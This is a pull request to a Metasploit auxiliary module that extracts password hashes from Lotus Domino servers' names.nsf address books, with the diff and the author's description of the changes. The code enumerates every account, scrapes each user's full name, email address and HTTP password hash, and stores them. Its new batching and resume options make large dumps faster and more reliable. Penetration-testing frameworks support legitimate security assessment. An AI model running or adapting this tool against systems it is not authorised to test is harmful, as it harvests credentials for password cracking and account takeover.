### PR TITLE
lotus_domino_hashes scanner speedup and fixes

### DIFF
--- a/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb
+++ b/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb
@@ -26,11 +26,13 @@ class Metasploit3 < Msf::Auxiliary
 			'License'        => MSF_LICENSE
 		)
 
-	register_options(
+		register_options(
 		[
 			OptString.new('NOTES_USER', [false, 'The username to authenticate as', '']),
 			OptString.new('NOTES_PASS', [false, 'The password for the specified username' ]),
 			OptString.new('URI', [false, 'Define the path to the names.nsf file', '/names.nsf']),
+			OptString.new('START_INDEX', [false, 'Index to start at', '1']),
+			OptString.new('STEP_SIZE', [false, 'Number of records to enumerate at once', '10000']),
 		], self.class)
 
 	end
@@ -41,84 +43,118 @@ class Metasploit3 < Msf::Auxiliary
 		pass = datastore['NOTES_PASS'].to_s
 		$uri =  datastore['URI'].to_s
 
-		if (user.length == 0 and pass.length == 0)
-			print_status("http://#{vhost}:#{rport} - Lotus Domino - Trying dump password hashes without credentials")
+		proto = ssl ? "https" : "http"
+		$site = "#{proto}://#{vhost}:#{rport}"
+
+		formauth = false
+		if (user.length != 0)
+			begin
+				res = send_request_raw({
+					'method'  => 'GET',
+					'uri'     => "#{$uri}",
+				}, 25)
+			rescue
+				print_error("#{$site} - Initial connection to test auth failed")
+				return
+			end
+
+			if (res and res.code == 401)
+				print_status("#{$site} - Lotus Domino - Site appears to use basic authentication")
+				datastore['BasicAuthUser'] = user
+				datastore['BasicAuthPass'] = pass
+			elsif (res and res.code == 200)
+				print_status("#{$site} - Lotus Domino - Site appears to use form authentication")
+				formauth = true
+			else
+				print_error("#{$site} - Lotus Domino - Unrecognized #{res.code} response")
+				return :abort
+			end
+		end
+
+		if (formauth)
+			print_status("#{$site} - Lotus Domino - Trying to dump password hashes with given credentials")
+			do_login(user, pass)
+
+		else
+			if (user.length == 0 and pass.length == 0)
+				print_status("#{$site} - Lotus Domino - Trying to dump password hashes without credentials")
+			else
+				print_status("#{$site} - Lotus Domino - Trying to dump password hashes with basic auth credentials")
+			end
 
 			begin
 				res = send_request_raw({
 					'method'  => 'GET',
 					'uri'     => "#{$uri}\/$defaultview?Readviewentries",
 				}, 25)
-
-				if (res and res.body.to_s =~ /\<viewentries/)
-					print_good("http://#{vhost}:#{rport} - Lotus Domino - OK names.nsf accessible without credentials")
-					cookie = ''
-					get_views(cookie,$uri)
-
-				elsif (res and res.body.to_s =~ /names.nsf\?Login/)
-					print_error("http://#{vhost}:#{rport} - Lotus Domino - The remote server requires authentication")
-					return :abort
-
-				else
-					print_error("http://#{vhost}:#{rport} - Lotus Domino - Unrecognized #{res.code} response")
-					print_error(res.inspect)
-					return :abort
-
-				end
-
-				rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-				rescue ::Timeout::Error, ::Errno::EPIPE
+			rescue
+				print_error("#{$site} - Initial connection failed")
+				return
 			end
 
-		else
-			print_status("http://#{vhost}:#{rport} - Lotus Domino - Trying dump password hashes with given credentials")
-			do_login(user, pass)
+			if (res and res.body.to_s =~ /\<viewentries/)
+				print_good("#{$site} - Lotus Domino - OK names.nsf accessible")
+				cookie = ''
+				get_views(cookie,$uri)
 
+			elsif (res and res.body.to_s =~ /names.nsf\?Login/)
+				print_error("#{$site} - Lotus Domino - The remote server requires authentication")
+				return :abort
+
+			elsif (res and res.code == 401)
+				if (user.length == 0 and pass.length == 0)
+					print_error("#{$site} - Lotus Domino - The remote server requires basic authentication")
+				else
+					print_error("#{$site} - Lotus Domino - Basic authentication failed")
+				end
+				return :abort
+			else
+				print_error("#{$site} - Lotus Domino - Unrecognized #{res.code} response")
+				return :abort
+			end
 		end
-
 	end
-
 
 	def do_login(user=nil,pass=nil)
 		post_data = "username=#{Rex::Text.uri_encode(user.to_s)}&password=#{Rex::Text.uri_encode(pass.to_s)}&RedirectTo=%2Fnames.nsf"
 
 		begin
-
 			res = send_request_cgi({
 				'method'  => 'POST',
 				'uri'     => '/names.nsf?Login',
 				'data'    => post_data,
 			}, 20)
-
-			if (res and res.code == 302 )
-				if res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/DomAuthSessId=(.*);(.*)/i)
-					cookie = "DomAuthSessId=#{$1}"
-				elsif res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/LtpaToken=(.*);(.*)/i)
-					cookie = "LtpaToken=#{$1}"
-				else
-					print_error("http://#{vhost}:#{rport} - Lotus Domino - Unrecognized 302 response")
-					return :abort
-				end
-				print_good("http://#{vhost}:#{rport} - Lotus Domino - SUCCESSFUL authentication for '#{user}'")
-				print_status("http://#{vhost}:#{rport} - Lotus Domino - Getting password hashes")
-				get_views(cookie,$uri)
-
-			elsif (res and res.body.to_s =~ /names.nsf\?Login/)
-					print_error("http://#{vhost}:#{rport} - Lotus Domino - Authentication error: failed to login as '#{user}'")
-					return :abort
-
-			else
-				print_error("http://#{vhost}:#{rport} - Lotus Domino - Unrecognized #{res.code} response")
-				return :abort
-			end
-
-			rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-			rescue ::Timeout::Error, ::Errno::EPIPE
+		rescue
+			print_error("#{$site} - Lotus Domino - Login connection failed")
+			return
 		end
 
+		if (res and res.code == 302 )
+			if res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/DomAuthSessId=(.*);(.*)/i)
+				cookie = "DomAuthSessId=#{$1}"
+			elsif res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/LtpaToken=(.*);(.*)/i)
+				cookie = "LtpaToken=#{$1}"
+			else
+				print_error("#{$site} - Lotus Domino - Unrecognized 302 response")
+				return :abort
+			end
+			print_good("#{$site} - Lotus Domino - SUCCESSFUL authentication for '#{user}'")
+			print_status("#{$site} - Lotus Domino - Getting password hashes")
+			get_views(cookie,$uri)
+
+		elsif (res and res.body.to_s =~ /names.nsf\?Login/)
+			print_error("#{$site} - Lotus Domino - Authentication error: failed to login as '#{user}'")
+			return :abort
+		else
+			print_error("#{$site} - Lotus Domino - Unrecognized #{res.code} response")
+			return :abort
+		end
 	end
 
 	def get_views(cookie,uri)
+
+		start = datastore['START_INDEX'].to_i
+		step = datastore['STEP_SIZE'].to_i
 
 		begin
 			res = send_request_raw({
@@ -126,25 +162,48 @@ class Metasploit3 < Msf::Auxiliary
 				'uri'     => "#{uri}\/$defaultview?Readviewentries",
 				'cookie'  => cookie,
 			}, 25)
-			if (res and res.body)
-				max = res.body.scan(/siblings=\"(.*)\"/)[0].join
+		rescue
+			print_error("#{$site} - Lotus Domino - Request to enumerate entries failed")
+			return
+		end
 
-				1.upto(max.to_i) {|i|
-					res = send_request_raw({
-						'method'  => 'GET',
-						'uri'     => "#{uri}\/$defaultview?Readviewentries&Start=#{i}",
-						'cookie'  => cookie,
-					}, 25)
+		if (not res or not res.body)
+			print_error("#{$site} - Lotus Domino - Request to enumerate entries failed")
+			return
+		end
 
-				viewId = res.body.scan(/unid="([^\s]+)"/)[0].join
-				dump_hashes(viewId,cookie,uri)
-				}
+		max = res.body.scan(/siblings=\"(.*)\"/)[0].join
 
+		print_good("#{$site} - Lotus Domino - #{max} potential accounts found")
+
+		(start .. max.to_i).step(step) {|i|
+			begin
+				res = send_request_raw({
+					'method'  => 'GET',
+					'uri'     => "#{uri}\/$defaultview?Readviewentries&Start=#{i}&Count=#{step}",
+					'cookie'  => cookie,
+				}, 25)
+			rescue
+				print_error("#{$site} - Lotus Domino - Request for batch of users starting at #{i} failed, stopping dump. Use START_INDEX to resume the dump")
+				return
 			end
 
-			rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-			rescue ::Timeout::Error, ::Errno::EPIPE
-		end
+			if (not res or not res.body)
+				print_error("#{$site} - Lotus Domino - Request for batch of users starting at #{i} failed, stopping dump. Use START_INDEX to resume the dump")
+				return
+			end
+
+			current = i
+			res.body.scan(/unid="([^\s]+)"/){ |viewId|
+				current = current + 1
+				if dump_hashes(viewId[0],cookie,uri) == -1
+					print_error("#{$site} - Lotus Domino - Request for entry #{current} failed, stopping dump. Use START_INDEX to resume the dump")
+					return
+				end
+			}
+		}
+
+		print_good("#{$site} - Lotus Domino - All accounts successfully dumped")
 	end
 
 	def dump_hashes(view_id,cookie,uri)
@@ -155,49 +214,53 @@ class Metasploit3 < Msf::Auxiliary
 				'uri'     => "#{uri}\/$defaultview/#{view_id}?OpenDocument",
 				'cookie'  => cookie,
 			}, 25)
-
-			if (res and res.body)
-				short_name = res.body.scan(/<INPUT NAME=\"ShortName\" TYPE=(?:.*) VALUE=\"([^\s]+)"/i).join
-				user_mail = res.body.scan(/<INPUT NAME=\"InternetAddress\" TYPE=(?:.*) VALUE=\"([^\s]+)"/i).join
-				pass_hash = res.body.scan(/<INPUT NAME=\"dspHTTPPassword\" TYPE=(?:.*) VALUE=\"([^\s]+)"/i).join
-
-				if short_name.to_s.strip.empty?
-					short_name = 'NULL'
-				end
-
-				if user_mail.to_s.strip.empty?
-					user_mail = 'NULL'
-				end
-
-				if pass_hash.to_s.strip.empty?
-					pass_hash = 'NULL'
-				end
-
-				print_good("http://#{vhost}:#{rport} - Lotus Domino - Account Found: #{short_name}, #{user_mail}, #{pass_hash}")
-
-				if pass_hash != 'NULL'
-					domino_svc = report_service(
-						:host => rhost,
-						:port => rport,
-						:name => "http"
-					)
-					report_auth_info(
-						:host        => rhost,
-						:port        => rport,
-						:sname       => (ssl ? "https" : "http"),
-						:user        => short_name,
-						:pass        => pass_hash,
-						:ptype       => "domino_hash",
-						:source_id => domino_svc.id,
-						:source_type => "service",
-						:proof       => "WEBAPP=\"Lotus Domino\", USER_MAIL=#{user_mail}, HASH=#{pass_hash}, VHOST=#{vhost}",
-						:active      => true
-					)
-				end
-			end
-
-			rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-			rescue ::Timeout::Error, ::Errno::EPIPE
+		rescue
+			return -1
 		end
+
+		if (not res or not res.body)
+			return -1
+		end
+
+		full_name = res.body.scan(/<INPUT NAME=\"FullName\" TYPE=(?:.*) VALUE=\"(.*?)"/i).join
+		user_mail = res.body.scan(/<INPUT NAME=\"InternetAddress\" TYPE=(?:.*) VALUE=\"([^\s]+)"/i).join
+		pass_hash = res.body.scan(/<INPUT NAME=\"dspHTTPPassword\" TYPE=(?:.*) VALUE=\"([^\s]+)"/i).join
+
+		if full_name.to_s.strip.empty?
+			full_name = 'NULL'
+		end
+
+		if user_mail.to_s.strip.empty?
+			user_mail = 'NULL'
+		end
+
+		if pass_hash.to_s.strip.empty?
+			pass_hash = 'NULL'
+		end
+
+		print_good("#{$site} - Lotus Domino - Account Found: #{full_name}, #{user_mail}, #{pass_hash}")
+
+		if pass_hash != 'NULL'
+			domino_svc = report_service(
+				:host => rhost,
+				:port => rport,
+				:name => (ssl ? "https" : "http")
+			)
+
+			report_auth_info(
+				:host        => rhost,
+				:port        => rport,
+				:sname       => (ssl ? "https" : "http"),
+				:user        => full_name,
+				:pass        => pass_hash,
+				:ptype       => "domino_hash",
+				:source_id   => (domino_svc ? domino_svc.id : nil),
+				:source_type => "service",
+				:proof       => "WEBAPP=\"Lotus Domino\", USER_MAIL=#{user_mail}, HASH=#{pass_hash}, VHOST=#{vhost}",
+				:active      => true
+			)
+		end
+
+		return 1
 	end
 end

--- a/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb
+++ b/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb
@@ -31,8 +31,8 @@ class Metasploit3 < Msf::Auxiliary
 			OptString.new('NOTES_USER', [false, 'The username to authenticate as', '']),
 			OptString.new('NOTES_PASS', [false, 'The password for the specified username' ]),
 			OptString.new('URI', [false, 'Define the path to the names.nsf file', '/names.nsf']),
-			OptString.new('START_INDEX', [false, 'Index to start at', '1']),
-			OptString.new('STEP_SIZE', [false, 'Number of records to enumerate at once', '10000']),
+			OptInt.new('START_INDEX', [false, 'Index to start at', '1']),
+			OptInt.new('STEP_SIZE', [false, 'Number of records to enumerate at once', '10000']),
 		], self.class)
 
 	end
@@ -41,169 +41,166 @@ class Metasploit3 < Msf::Auxiliary
 
 		user = datastore['NOTES_USER'].to_s
 		pass = datastore['NOTES_PASS'].to_s
-		$uri =  datastore['URI'].to_s
-
-		proto = ssl ? "https" : "http"
-		$site = "#{proto}://#{vhost}:#{rport}"
+		uri =  datastore['URI']
 
 		formauth = false
-		if (user.length != 0)
+		if user.length != 0
 			begin
 				res = send_request_raw({
 					'method'  => 'GET',
-					'uri'     => "#{$uri}",
+					'uri'     => "#{uri}"
 				}, 25)
 			rescue
-				print_error("#{$site} - Initial connection to test auth failed")
-				return
+				print_error("#{msg} Initial connection to test auth failed")
+				return :abort
 			end
 
-			if (res and res.code == 401)
-				print_status("#{$site} - Lotus Domino - Site appears to use basic authentication")
+			if res and res.code == 401
+				print_status("#{msg} Site appears to use basic authentication")
 				datastore['BasicAuthUser'] = user
 				datastore['BasicAuthPass'] = pass
-			elsif (res and res.code == 200)
-				print_status("#{$site} - Lotus Domino - Site appears to use form authentication")
+			elsif res and res.body =~ /#{Regexp.escape(uri)}\?Login/
+				print_status("#{msg} Site appears to use form authentication")
 				formauth = true
 			else
-				print_error("#{$site} - Lotus Domino - Unrecognized #{res.code} response")
+				print_error("#{msg} Unrecognized #{res.code} response")
 				return :abort
 			end
 		end
 
-		if (formauth)
-			print_status("#{$site} - Lotus Domino - Trying to dump password hashes with given credentials")
-			do_login(user, pass)
+		if formauth
+			print_status("#{msg} Trying to dump password hashes with given credentials")
+			do_login(user, pass, uri)
 
 		else
-			if (user.length == 0 and pass.length == 0)
-				print_status("#{$site} - Lotus Domino - Trying to dump password hashes without credentials")
+			if user.length == 0 and pass.length == 0
+				print_status("#{msg} Trying to dump password hashes without credentials")
 			else
-				print_status("#{$site} - Lotus Domino - Trying to dump password hashes with basic auth credentials")
+				print_status("#{msg} Trying to dump password hashes with basic auth credentials")
 			end
 
 			begin
 				res = send_request_raw({
 					'method'  => 'GET',
-					'uri'     => "#{$uri}\/$defaultview?Readviewentries",
+					'uri'     => "#{uri}\/$defaultview?Readviewentries"
 				}, 25)
 			rescue
-				print_error("#{$site} - Initial connection failed")
+				print_error("#{msg} Initial connection failed")
 				return
 			end
 
-			if (res and res.body.to_s =~ /\<viewentries/)
-				print_good("#{$site} - Lotus Domino - OK names.nsf accessible")
+			if res and res.body =~ /\<viewentries/
+				print_good("#{msg} OK #{uri} accessible")
 				cookie = ''
-				get_views(cookie,$uri)
+				get_views(cookie,uri)
 
-			elsif (res and res.body.to_s =~ /names.nsf\?Login/)
-				print_error("#{$site} - Lotus Domino - The remote server requires authentication")
+			elsif res and res.body =~ /#{Regexp.escape(uri)}\?Login/
+				print_error("#{msg} The remote server requires authentication")
 				return :abort
 
-			elsif (res and res.code == 401)
-				if (user.length == 0 and pass.length == 0)
-					print_error("#{$site} - Lotus Domino - The remote server requires basic authentication")
+			elsif res and res.code == 401
+				if user.length == 0 and pass.length == 0
+					print_error("#{msg} The remote server requires basic authentication")
 				else
-					print_error("#{$site} - Lotus Domino - Basic authentication failed")
+					print_error("#{msg} Basic authentication failed")
 				end
 				return :abort
 			else
-				print_error("#{$site} - Lotus Domino - Unrecognized #{res.code} response")
+				print_error("#{msg} Unrecognized #{res.code} response")
 				return :abort
 			end
 		end
 	end
 
-	def do_login(user=nil,pass=nil)
-		post_data = "username=#{Rex::Text.uri_encode(user.to_s)}&password=#{Rex::Text.uri_encode(pass.to_s)}&RedirectTo=%2Fnames.nsf"
+	def do_login(user=nil,pass=nil,uri)
+		post_data = "username=#{Rex::Text.uri_encode(user.to_s)}&password=#{Rex::Text.uri_encode(pass.to_s)}&RedirectTo=#{uri}"
 
 		begin
 			res = send_request_cgi({
 				'method'  => 'POST',
-				'uri'     => '/names.nsf?Login',
-				'data'    => post_data,
+				'uri'     => "#{uri}?Login",
+				'data'    => post_data
 			}, 20)
 		rescue
-			print_error("#{$site} - Lotus Domino - Login connection failed")
+			print_error("#{msg} Login connection failed")
 			return
 		end
 
-		if (res and res.code == 302 )
+		if res and res.code == 302
 			if res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/DomAuthSessId=(.*);(.*)/i)
 				cookie = "DomAuthSessId=#{$1}"
 			elsif res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/LtpaToken=(.*);(.*)/i)
 				cookie = "LtpaToken=#{$1}"
 			else
-				print_error("#{$site} - Lotus Domino - Unrecognized 302 response")
+				print_error("#{msg} Unrecognized 302 response")
 				return :abort
 			end
-			print_good("#{$site} - Lotus Domino - SUCCESSFUL authentication for '#{user}'")
-			print_status("#{$site} - Lotus Domino - Getting password hashes")
-			get_views(cookie,$uri)
+			print_good("#{msg} SUCCESSFUL authentication for '#{user}'")
+			print_status("#{msg} Getting password hashes")
+			get_views(cookie,uri)
 
-		elsif (res and res.body.to_s =~ /names.nsf\?Login/)
-			print_error("#{$site} - Lotus Domino - Authentication error: failed to login as '#{user}'")
+		elsif res and res.body =~ /#{Regexp.escape(uri)}\?Login/
+			print_error("#{msg} Authentication error: failed to login as '#{user}'")
 			return :abort
 		else
-			print_error("#{$site} - Lotus Domino - Unrecognized #{res.code} response")
+			print_error("#{msg} Unrecognized #{res.code} response")
 			return :abort
 		end
 	end
 
 	def get_views(cookie,uri)
 
-		start = datastore['START_INDEX'].to_i
-		step = datastore['STEP_SIZE'].to_i
+		start = datastore['START_INDEX']
+		step = datastore['STEP_SIZE']
 
 		begin
 			res = send_request_raw({
 				'method'  => 'GET',
 				'uri'     => "#{uri}\/$defaultview?Readviewentries",
-				'cookie'  => cookie,
+				'cookie'  => cookie
 			}, 25)
 		rescue
-			print_error("#{$site} - Lotus Domino - Request to enumerate entries failed")
+			print_error("#{msg} Request to enumerate entries failed")
 			return
 		end
 
-		if (not res or not res.body)
-			print_error("#{$site} - Lotus Domino - Request to enumerate entries failed")
+		if !res or !res.body
+			print_error("#{msg} Request to enumerate entries failed")
 			return
 		end
 
 		max = res.body.scan(/siblings=\"(.*)\"/)[0].join
 
-		print_good("#{$site} - Lotus Domino - #{max} potential accounts found")
+		print_good("#{msg} #{max} potential accounts found")
 
-		(start .. max.to_i).step(step) {|i|
+		(start .. max.to_i).step(step) do |i|
 			begin
 				res = send_request_raw({
 					'method'  => 'GET',
 					'uri'     => "#{uri}\/$defaultview?Readviewentries&Start=#{i}&Count=#{step}",
-					'cookie'  => cookie,
+					'cookie'  => cookie
 				}, 25)
 			rescue
-				print_error("#{$site} - Lotus Domino - Request for batch of users starting at #{i} failed, stopping dump. Use START_INDEX to resume the dump")
+				print_error("#{msg} Request for batch of users starting at #{i} failed, stopping dump. Use START_INDEX to resume the dump")
 				return
 			end
 
-			if (not res or not res.body)
-				print_error("#{$site} - Lotus Domino - Request for batch of users starting at #{i} failed, stopping dump. Use START_INDEX to resume the dump")
+			if !res or !res.body
+				print_error("#{msg} Request for batch of users starting at #{i} failed, stopping dump. Use START_INDEX to resume the dump")
 				return
 			end
 
 			current = i
-			res.body.scan(/unid="([^\s]+)"/){ |viewId|
+			res.body.scan(/unid="([^\s]+)"/) do |viewId|
 				current = current + 1
 				if dump_hashes(viewId[0],cookie,uri) == -1
-					print_error("#{$site} - Lotus Domino - Request for entry #{current} failed, stopping dump. Use START_INDEX to resume the dump")
+					print_error("#{msg} Request for entry #{current} failed, stopping dump. Use START_INDEX to resume the dump")
 					return
 				end
-			}
-		}
+			end
+		end
 
-		print_good("#{$site} - Lotus Domino - All accounts successfully dumped")
+		print_good("#{msg} All accounts successfully dumped")
 	end
 
 	def dump_hashes(view_id,cookie,uri)
@@ -212,13 +209,13 @@ class Metasploit3 < Msf::Auxiliary
 			res = send_request_raw({
 				'method'  => 'GET',
 				'uri'     => "#{uri}\/$defaultview/#{view_id}?OpenDocument",
-				'cookie'  => cookie,
+				'cookie'  => cookie
 			}, 25)
 		rescue
 			return -1
 		end
 
-		if (not res or not res.body)
+		if !res or !res.body
 			return -1
 		end
 
@@ -226,21 +223,21 @@ class Metasploit3 < Msf::Auxiliary
 		user_mail = res.body.scan(/<INPUT NAME=\"InternetAddress\" TYPE=(?:.*) VALUE=\"([^\s]+)"/i).join
 		pass_hash = res.body.scan(/<INPUT NAME=\"dspHTTPPassword\" TYPE=(?:.*) VALUE=\"([^\s]+)"/i).join
 
-		if full_name.to_s.strip.empty?
-			full_name = 'NULL'
+		if full_name.strip.empty?
+			full_name = nil
 		end
 
-		if user_mail.to_s.strip.empty?
-			user_mail = 'NULL'
+		if user_mail.strip.empty?
+			user_mail = nil
 		end
 
-		if pass_hash.to_s.strip.empty?
-			pass_hash = 'NULL'
+		if pass_hash.strip.empty?
+			pass_hash = nil
 		end
 
-		print_good("#{$site} - Lotus Domino - Account Found: #{full_name}, #{user_mail}, #{pass_hash}")
+		if pass_hash
+			print_good("#{msg} Account Found: #{full_name}, #{user_mail}, #{pass_hash}")
 
-		if pass_hash != 'NULL'
 			domino_svc = report_service(
 				:host => rhost,
 				:port => rport,
@@ -263,4 +260,10 @@ class Metasploit3 < Msf::Auxiliary
 
 		return 1
 	end
+
+	def msg
+		proto = ssl ? "https" : "http"
+		"#{proto}://#{vhost}:#{rport} - Lotus Domino -"
+	end
+
 end


### PR DESCRIPTION
- Record the FullName of the account and not the ShortName. The
  ShortName is not always allowed to be used for logging in to servers
  and is disabled by default post-Domino 6
  (http://www-01.ibm.com/support/docview.wss?uid=swg21218067).
  
  NOTE: One issue that has not been cleanly resolved here is that the
  FullName parameter is actually a list of names. Currently I do not
  process the FullName after retrieving it and store the list of
  usernames as the username. Thus an entry for the user 'Joe
  Schmoe/US/COMPANY; Joe Schmoe' is created. This isn't particularly
  clean or correct IMO but I'm not sure I like either of the other two
  options I can think of either:
  
  1) Split on the ; and store the first entry. Downside: loses an
     alternate account name that may be useful information.
  2) Split on the ; and store each entry as a separate credential.
     Downside: Many duplicates in the credential database. As the names
     are not necessarily easy to uniquify this could make reporting on
     the credentials more painful.
- Support retrieving entries via Readviewentries in larger batches than
  by default. Also actually process the Readviewentries response as a
  list of account IDs rather than just grabbing the first account ID
  each time. Together these two changes provide a significant speedup on
  large sites as it halves the total number of HTTP requests needed.
  I set the batch size at what I believe is a reasonable number (10000).
  Documentation I have seen says the largest possible Count value is
  65535 but I left it a bit lower to not put too much load in a single
  request. 10k accounts is probably about a 5MB XML response.
- Support restarting hash retrieval from a particular index in
  Readviewentries. This is very useful if you have say pulled 6000 of
  12000 password hashes when the server times out a connection.
- Make exception handling consistent throughout and handle all
  connection errors. If we fail partway through a site report the index
  we were requesting so that the user can set the index to resume from.
  
  NOTE: I'm new to ruby and I went with blanket rescues here
  because I couldn't find an authoritative list of exceptions that
  might result in the HTTP connection failing. As I went with 
  catch-alls I made the begin/rescue blocks as small as possible 
  around the send_request_raw calls but I'm open to better ways
  to do it. It is critical that failed HTTP connections be handled
  so that we know what account index we were on though. In
  dumping large databases the previous version would silently
  stop on a network error fooling the user into thinking the dump
  had completed successfully. We need to be able to reliably
  report there was a failure and where the failure occurred so 
  resuming dumps is possible.
- Support basic and form authentication using the same settings. Use the
  HTTP response code to figure out which route to go. Previously if
  you set NOTES_USER/NOTES_PASS these creds would not be used
  if the Domino server was configured to require basic auth. I thought
  this confusing so changed it around.
- Fix prints to report the correct protocol when using SSL.
- Check report_service's return value is valid before using.
